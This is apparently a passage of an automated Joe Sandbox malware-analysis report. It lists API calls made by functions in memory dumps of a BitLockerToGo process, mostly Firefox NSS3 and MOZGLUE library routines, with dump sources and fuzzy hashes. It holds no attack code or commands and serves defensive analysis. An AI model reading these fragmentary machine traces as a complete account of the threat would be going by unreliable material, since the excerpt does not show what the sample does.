                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 6CAB2D61
                                                                                                                                                                                                                                                                                                                    • PL_HashTableLookup.NSS3(?,?), ref: 6CAB2D71
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(?), ref: 6CAB2D7E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CA1204A), ref: 6CA807AD
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA1204A), ref: 6CA807CD
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA1204A), ref: 6CA807D6
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CA1204A), ref: 6CA807E4
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: TlsSetValue.KERNEL32(00000000,?,6CA1204A), ref: 6CA80864
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CA80880
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: TlsSetValue.KERNEL32(00000000,?,?,6CA1204A), ref: 6CA808CB
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: TlsGetValue.KERNEL32(?,?,6CA1204A), ref: 6CA808D7
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: TlsGetValue.KERNEL32(?,?,6CA1204A), ref: 6CA808FB
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 2446853827-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 387319f0e4e10073d3df49fb41dc4a6c0a7c187711b55ca835f72c1aea7e7b96
                                                                                                                                                                                                                                                                                                                    • Instruction ID: d525901db5af90cb5368c69a710892b32b8be7ca8603a147bb3ccd652c351100
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 387319f0e4e10073d3df49fb41dc4a6c0a7c187711b55ca835f72c1aea7e7b96
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2851F8B5D00204ABDB009F74EC459AA7778FF09358B088625EC18A7B11E731EDA8C7E1
                                                                                                                                                                                                                                                                                                                    Function 6CA14C70 Relevance: 18.1, APIs: 12, Instructions: 116threadCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32(?,?,?,6CA13921,6CBF14E4,6CB5CC70), ref: 6CA14C97
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,6CA13921,6CBF14E4,6CB5CC70), ref: 6CA14CB0
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(?,?,?,?,?,6CA13921,6CBF14E4,6CB5CC70), ref: 6CA14CC9
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32(?,?,?,?,?,6CA13921,6CBF14E4,6CB5CC70), ref: 6CA14D11
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6CA13921,6CBF14E4,6CB5CC70), ref: 6CA14D2A
                                                                                                                                                                                                                                                                                                                    • PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6CA13921,6CBF14E4,6CB5CC70), ref: 6CA14D4A
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(?,?,?,?,?,?,?,6CA13921,6CBF14E4,6CB5CC70), ref: 6CA14D57
                                                                                                                                                                                                                                                                                                                    • PR_GetCurrentThread.NSS3(?,?,?,?,?,6CA13921,6CBF14E4,6CB5CC70), ref: 6CA14D97
                                                                                                                                                                                                                                                                                                                    • PR_Lock.NSS3(?,?,?,?,?,6CA13921,6CBF14E4,6CB5CC70), ref: 6CA14DBA
                                                                                                                                                                                                                                                                                                                    • PR_WaitCondVar.NSS3 ref: 6CA14DD4
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(?,?,?,?,?,6CA13921,6CBF14E4,6CB5CC70), ref: 6CA14DE6
                                                                                                                                                                                                                                                                                                                    • PR_GetCurrentThread.NSS3(?,?,?,?,?,6CA13921,6CBF14E4,6CB5CC70), ref: 6CA14DEF
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 3388019835-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 15d3143648a93f8a6ea9a39fe0f4470a7181c4c78855533f193a704dcbcdf311
                                                                                                                                                                                                                                                                                                                    • Instruction ID: ae99fcfd8e42f3d82a06b45a49fbf49430a2ae8492d9c0f12af73b841b044839
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 15d3143648a93f8a6ea9a39fe0f4470a7181c4c78855533f193a704dcbcdf311
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 73416DB5A19A558FCB00AFBDE08455DBBB4BF05318F094A69D8989BB00E730D8D5CB81
                                                                                                                                                                                                                                                                                                                    Function 6C973480 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 86librarytimeloaderCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6C973284,?,?,6C9956F6), ref: 6C973492
                                                                                                                                                                                                                                                                                                                    • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6C973284,?,?,6C9956F6), ref: 6C9734A9
                                                                                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6C973284,?,?,6C9956F6), ref: 6C9734EF
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6C97350E
                                                                                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C973522
                                                                                                                                                                                                                                                                                                                    • __aulldiv.LIBCMT ref: 6C973552
                                                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6C973284,?,?,6C9956F6), ref: 6C97357C
                                                                                                                                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6C973284,?,?,6C9956F6), ref: 6C973592
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9AAB89: EnterCriticalSection.KERNEL32(6C9FE370,?,?,?,6C9734DE,6C9FF6CC,?,?,?,?,?,?,?,6C973284), ref: 6C9AAB94
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9AAB89: LeaveCriticalSection.KERNEL32(6C9FE370,?,6C9734DE,6C9FF6CC,?,?,?,?,?,?,?,6C973284,?,?,6C9956F6), ref: 6C9AABD1
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
                                                                                                                                                                                                                                                                                                                    • String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
                                                                                                                                                                                                                                                                                                                    • API String ID: 3634367004-706389432
                                                                                                                                                                                                                                                                                                                    • Opcode ID: ad243b288cc2aba9a48489a379b97855dd508fcbabf96b7403cb3293a2dd96c8
                                                                                                                                                                                                                                                                                                                    • Instruction ID: d6d2be7c827657bc3e1cd9d43eaf4567ca8d79e2885430ec49ecf6ae823f32d9
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ad243b288cc2aba9a48489a379b97855dd508fcbabf96b7403cb3293a2dd96c8
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C31E271B052099BDF10DFB9E848AAE77B9FB86309F200019E525E3650EB71E905CFA0
                                                                                                                                                                                                                                                                                                                    Function 6CADECE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6CADDE64), ref: 6CADED0C
                                                                                                                                                                                                                                                                                                                    • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CADED22
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAEB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CBC18D0,?), ref: 6CAEB095
                                                                                                                                                                                                                                                                                                                    • PL_FreeArenaPool.NSS3(?), ref: 6CADED4A
                                                                                                                                                                                                                                                                                                                    • PL_FinishArenaPool.NSS3(?), ref: 6CADED6B
                                                                                                                                                                                                                                                                                                                    • PR_CallOnce.NSS3(6CBF2AA4,6CAF12D0), ref: 6CADED38
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA14C70: TlsGetValue.KERNEL32(?,?,?,6CA13921,6CBF14E4,6CB5CC70), ref: 6CA14C97
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA14C70: EnterCriticalSection.KERNEL32(?,?,?,?,6CA13921,6CBF14E4,6CB5CC70), ref: 6CA14CB0
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA14C70: PR_Unlock.NSS3(?,?,?,?,?,6CA13921,6CBF14E4,6CB5CC70), ref: 6CA14CC9
                                                                                                                                                                                                                                                                                                                    • SECOID_FindOID_Util.NSS3(?), ref: 6CADED52
                                                                                                                                                                                                                                                                                                                    • PR_CallOnce.NSS3(6CBF2AA4,6CAF12D0), ref: 6CADED83
                                                                                                                                                                                                                                                                                                                    • PL_FreeArenaPool.NSS3(?), ref: 6CADED95
                                                                                                                                                                                                                                                                                                                    • PL_FinishArenaPool.NSS3(?), ref: 6CADED9D
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF64F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6CAF127C,00000000,00000000,00000000), ref: 6CAF650E
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
                                                                                                                                                                                                                                                                                                                    • String ID: security
                                                                                                                                                                                                                                                                                                                    • API String ID: 3323615905-3315324353
                                                                                                                                                                                                                                                                                                                    • Opcode ID: c0dab54fd4b6585f1a972a8093b708410038615e2722ff15db095d8d69e2b788
                                                                                                                                                                                                                                                                                                                    • Instruction ID: acbf13c159c534494e6b54acc00a113cc1fba67a78107293003d9e6488cb052e
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c0dab54fd4b6585f1a972a8093b708410038615e2722ff15db095d8d69e2b788
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C9112779A002046BE7106A25AD44BBBB278AF0171DF060924F8A563F41FB35B69D86E7
                                                                                                                                                                                                                                                                                                                    Function 6CBA0EB0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 65COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PR_LogPrint.NSS3(Aborting,?,6CA82357), ref: 6CBA0EB8
                                                                                                                                                                                                                                                                                                                    • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(6CA82357), ref: 6CBA0EC0
                                                                                                                                                                                                                                                                                                                    • PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6CBA0EE6
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CBA09D0: PR_Now.NSS3 ref: 6CBA0A22
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CBA09D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6CBA0A35
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CBA09D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6CBA0A66
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CBA09D0: PR_GetCurrentThread.NSS3 ref: 6CBA0A70
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CBA09D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6CBA0A9D
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CBA09D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6CBA0AC8
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CBA09D0: PR_vsmprintf.NSS3(?,?), ref: 6CBA0AE8
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CBA09D0: EnterCriticalSection.KERNEL32(?), ref: 6CBA0B19
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CBA09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CBA0B48
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CBA09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CBA0C76
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CBA09D0: PR_LogFlush.NSS3 ref: 6CBA0C7E
                                                                                                                                                                                                                                                                                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6CBA0EFA
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA8AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6CA8AF0E
                                                                                                                                                                                                                                                                                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CBA0F16
                                                                                                                                                                                                                                                                                                                    • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CBA0F1C
                                                                                                                                                                                                                                                                                                                    • DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CBA0F25
                                                                                                                                                                                                                                                                                                                    • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CBA0F2B
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: DebugPrintR_snprintf__acrt_iob_funcabort$BreakCriticalCurrentEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime__stdio_common_vfprintffflush
                                                                                                                                                                                                                                                                                                                    • String ID: Aborting$Assertion failure: %s, at %s:%d
                                                                                                                                                                                                                                                                                                                    • API String ID: 3905088656-1374795319
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 4f1484c5cfdd2dfe46b83b3a09a7acd77e8178ea501b38ae86fa81a12b99f6ee
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 0be977a3f73f7476379215e569672a62bb06d9610ffe25a0be0c062c08508a77
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4f1484c5cfdd2dfe46b83b3a09a7acd77e8178ea501b38ae86fa81a12b99f6ee
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 06F0C8B59002647BDE013BA0DC49C9B3E3DDF4A7B4F008424FD0957602DA76E92496B3
                                                                                                                                                                                                                                                                                                                    Function 6CB04DB0 Relevance: 16.9, APIs: 11, Instructions: 395memoryCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PORT_NewArena_Util.NSS3(00000400), ref: 6CB04DCB
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CA987ED,00000800,6CA8EF74,00000000), ref: 6CAF1000
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF0FF0: PR_NewLock.NSS3(?,00000800,6CA8EF74,00000000), ref: 6CAF1016
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF0FF0: PL_InitArenaPool.NSS3(00000000,security,6CA987ED,00000008,?,00000800,6CA8EF74,00000000), ref: 6CAF102B
                                                                                                                                                                                                                                                                                                                    • PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6CB04DE1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF10C0: TlsGetValue.KERNEL32(?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF10F3
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF10C0: EnterCriticalSection.KERNEL32(?,?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF110C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF10C0: PL_ArenaAllocate.NSS3(?,?,?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF1141
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF10C0: PR_Unlock.NSS3(?,?,?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF1182
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF10C0: TlsGetValue.KERNEL32(?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF119C
                                                                                                                                                                                                                                                                                                                    • PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6CB04DFF
                                                                                                                                                                                                                                                                                                                    • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CB04E59
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAEFAB0: free.MOZGLUE(?,-00000001,?,?,6CA8F673,00000000,00000000), ref: 6CAEFAC7
                                                                                                                                                                                                                                                                                                                    • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CBC300C,00000000), ref: 6CB04EB8
                                                                                                                                                                                                                                                                                                                    • SECOID_FindOID_Util.NSS3(?), ref: 6CB04EFF
                                                                                                                                                                                                                                                                                                                    • memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6CB04F56
                                                                                                                                                                                                                                                                                                                    • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CB0521A
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 1025791883-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: d97ef10c4f4d3cbb1211b4d1e2161965a03c4312f41a7929aeb340a57ec19a87
                                                                                                                                                                                                                                                                                                                    • Instruction ID: d431e8de08bb43ecacb8514916998daa1a08ab59271b8c18242f3ee9516ad88f
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d97ef10c4f4d3cbb1211b4d1e2161965a03c4312f41a7929aeb340a57ec19a87
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 18F1BC71F002498BDB08CF54D8407AEBBB2FF44358F254129E815ABB81EB75E986CF95
                                                                                                                                                                                                                                                                                                                    Function 6C974480 Relevance: 16.8, APIs: 11, Instructions: 316COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: free$moz_xmalloc
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 3009372454-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: df1d2f2c8ae3d45dc5eb9f97046375d61196fd916f7771b93eef5f226f88f2e2
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 8963a2ede5fd12478b1281ee225daac2195c97f262d13469df93e9388a5103ef
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: df1d2f2c8ae3d45dc5eb9f97046375d61196fd916f7771b93eef5f226f88f2e2
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E0B10371A021158FDB28CF7CD8A07AD77A6AF46328F180669E416DFB87D735D8408FA1
                                                                                                                                                                                                                                                                                                                    Function 6CB00C60 Relevance: 16.7, APIs: 11, Instructions: 153memoryCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
